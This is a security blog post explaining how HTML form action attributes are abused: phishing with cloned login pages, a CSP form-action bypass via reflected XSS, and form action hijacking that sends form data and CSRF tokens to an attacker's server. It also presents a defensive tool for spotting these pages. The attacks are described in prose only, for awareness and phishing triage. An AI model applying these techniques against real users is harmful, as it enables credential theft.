From the title itself, I think you know what this blog will be all about. But first let me redirect you to the past...
The old tradional method on filling out a form sheet, is holding up to its required information in a sheet of paper. After writing all the required data, we then submit it through the dropbox or the assigned entity who has the role to collect it. Decades has past, that system holds up until now. But is it the safest way? Is it the more efficient? Does this makes speed up the process? Is this better method than we had now? Way back when the internet is not yet the trend, information flows through a sheet of paper. The best way to compromised the data, is to perform physical exploitation, or the simplest word to put is 'theft'.
Fast forward on this generation, where internet has become the way of life. Where each individual can't live without a smartphone, a laptop or even a smartwatch with them. Data access has yet been the most convenient, as the flexibility rate of availability has been increasing as the years progress. Critical yet large sized data can now be stored on cloud, as the level of data risk storage has been on its peak. For every input of information we gave, is the risk for it to be compromised. For every information we share, is a delight on an entity responsible on compromising your data.
Internet is a whole new universe made up of millions of web applications, each interconnected to process and provide services. Majority of these web facing applications has database that handles all the user's data. No database is secure when the application itself is in the wild. Data flow from the client's to the webserver, and the path to this flow will not give you an assurance of secure data transport. Risk prevention tools would not apply a 100% assurance of security, but would sure do lessen the customer's risk of their data being compromised.
Flow of data, always originate from the user's data input. Input is written on a web forms, or the HTML forms or just simply -- forms. Forms serve as a piece paper where you write your informations. This is the digital perspective of a plain white paper of the 21st century. Sure is this can't torn down in to pieces. But in any ways possible, there will always be a chance that information would always leak. Once the informations are filled out, user will click on 'submit' and that's where the magic happens.
In this blog I'd like to point the ways attackers took advantage of this weakness and exploit such weakness towards the target. I will also walk you through a little program that I made, that will contribute for my future works.
Since webforms has the highest vector of threats in a web application, as this is the origin of a request session from the client to the web servers, attackers took advantage of this flaw. These attackers, with the aid of some initial attacks of exploiting the server(e.g. DNS hijacking) will often replicate a legit ecommerce website and redirect the user's form input to their malicious servers. These normally happen in phishing, where attacker sent out a spam mail containing malicious links. The links' goal is to trick the user to provide their critical informations(bank account assets, TIN, and account related infos) performing the classical social engineering techniques.
We all know that the action tag contains the URL or address where the user is redirected, once the user clicked on the submit button. Below's some known vulnerabilities of the form's action tag;
* Phishing - The action parameter which specifies the website where the user-submitted information is being sent, is fully controlled by the user. In this situation, the attacker can exploit this flaw by crafting a malicious link that would be aesthetically the same with a legit website , on the form action parameter. This link can be sent and distributed to the users in the organization in a form of phishing mail.
*Bypassing CSP form action with reflected XSS --> I have recently read a blogpost from "detectify labs" where the author provided a walkthrough on how he successfully bypassed CSP(Content-Security-Policy) by XSS/HTML injection on both Chrome and Mozilla. What he did, is that he overrides the form value by injecting a code that would bypassed the method to 'get'. So once the user clicked on the submit button, the victim will be redirected to the attacker's website, with the form action bypassed. You can read on the full article @https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/.
*Form action Hijacking - An attacker can construct a URL that will modify the action URL of a form to point to the attacker's server. Form content including CSRF tokens, user entered parameter values, and any other of the forms content will be delivered to the attacker via the hijacked action URL.
With all those attacks mentioned, how can we secure ourselves from those sort? Simple... Check the parameter values passed to the form action. How?
Being in the field of Cybersecurity, your client gave you a sample phish mail containing a malicious URL you have validate to be malicious. So normally, if you want to further investigate, where'd you go from there?
1. Launch your VM or test environment to launch the vulnerable site.
2. Right click on the page and right click on forms to inspect element.
3. Look for the form tag, and highlight the URL value in action tag.
4. Validate the URL if malicious on one of your favorite URL-checker.
4 simple steps. Easy, but still would spent some minute/s of your time. I have programmed a tool that will process those steps mentioned. All you need is the URL input of the suspected malicious site. Knowing that the site is a phish site, output would be:
1.URL redirection from the value of the form actions found on site.
2. Will highlight the log in form, and to what page the data will be sent once the user clicked on the submit button.
RUN
Let's run the program and see what it can do...
* On a legit site, let's say a non phish facebook must look like below
* From a known phishing site...
* Phishing on a banking scenario...
Take a look at the legit Bank of America website.
Now, take a look at the phish site...
If user is not security awared or not trained dealing with this sort, the user could easily provide information on the rogue site.
Running the program, here's the difference,
Phish site
Legit Site
With the proper training and awareness on phishing and social engineering, one can protect and secure their own assets. Organizations owning a web application must regularly secure their perimeter. Developer must properly sanitize their input, they must have a thorough examinations and validations before launching their application live. Bottomline is...
Careless data field>>results>> exploitable output
Which side are you on?
<krontek> halt
References and Special Thanks to:
(a)https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/
(b)The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd Edition; Dafydd Stuttard
Comentarios